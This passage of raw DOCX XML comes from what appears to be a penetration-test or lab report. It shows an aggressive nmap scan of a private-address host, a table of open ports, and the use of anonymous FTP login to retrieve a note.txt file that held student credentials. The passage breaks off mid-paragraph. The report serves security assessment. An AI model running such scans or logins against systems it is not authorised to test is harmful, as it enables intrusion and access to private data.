    <w:p w14:paraId="4541AE9A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>4.1 Network Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D42822" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The following Nmap command was used for aggressive service detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D146030" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>nmap -A -p- -T4 192.168.1.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB085A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C225C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-A enables OS detection, version detection, and default scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF1011" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-p- scans all 65535 ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418448D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-T4 uses an aggressive timing template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120AB00A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Open Ports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776"/>
        <w:gridCol w:w="694"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="67A79A8E" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1028CE" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69FA3103" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E37398D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="53C008DC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E12C9A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1078E2D2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A241B9" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="70785E82" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0920B1AC" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464CCD7B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B73B1CB" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="131C0D9A" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54CE900B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1378E8B7" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20846B7B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="372B9DBA" w14:textId="77F38351" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5401A1C0" wp14:editId="0492DD81">
            <wp:extent cx="5731510" cy="5398135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="38951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6084" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5398135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36427E19" w14:textId="3AE325BD" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="26475ECF">
          <v:rect id="_x0000_i1267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC64EB" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5. Vulnerability Findings &amp; Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE84B10" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="1B0D057E">
          <v:rect id="_x0000_i1268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C94676C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.1 Anonymous FTP Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450866E" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60420EE3" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>The FTP service running on port 21 allowed anonymous authentication, enabling unauthenticated users to access files on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61420E01" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>An attacker could retrieve sensitive files containing credentials or internal information, providing an initial foothold for further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2019A6" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084D49C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ftp 192.168.1.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD66AC" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Username: anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8B404" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Password: anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DEEDFF" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A file named note.txt was discovered and downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292B5EC" w14:textId="21D8F494" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2BA683" wp14:editId="746F723F">
            <wp:extent cx="5731510" cy="3817620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1979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587" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3817620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="325864E8" w14:textId="147E6A2D" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50BBF120" wp14:editId="4532F6F5">
            <wp:extent cx="5731510" cy="2818130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="62185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8202" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2818130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D22E2" w14:textId="43731E26" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="5D986187">
          <v:rect id="_x0000_i1269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69100A5F" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.2 Sensitive Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276AC949" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8C924" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>The note.txt file contained student-related credentials and internal information that assisted in identifying valid application entry points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0938D4" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>This information could be leveraged to gain unauthorized access to restricted web application functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386AA53" w14:textId="529084FE" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4AF199" wp14:editId="42FAE5EC">
            <wp:extent cx="5731510" cy="4951095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="8343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5812" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4951095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602DCA2" w14:textId="1BA3B270" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72013ED0" wp14:editId="78EE373F">
            <wp:extent cx="5731510" cy="2599055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18772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7767" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2599055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED5F330" w14:textId="6E68A983" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
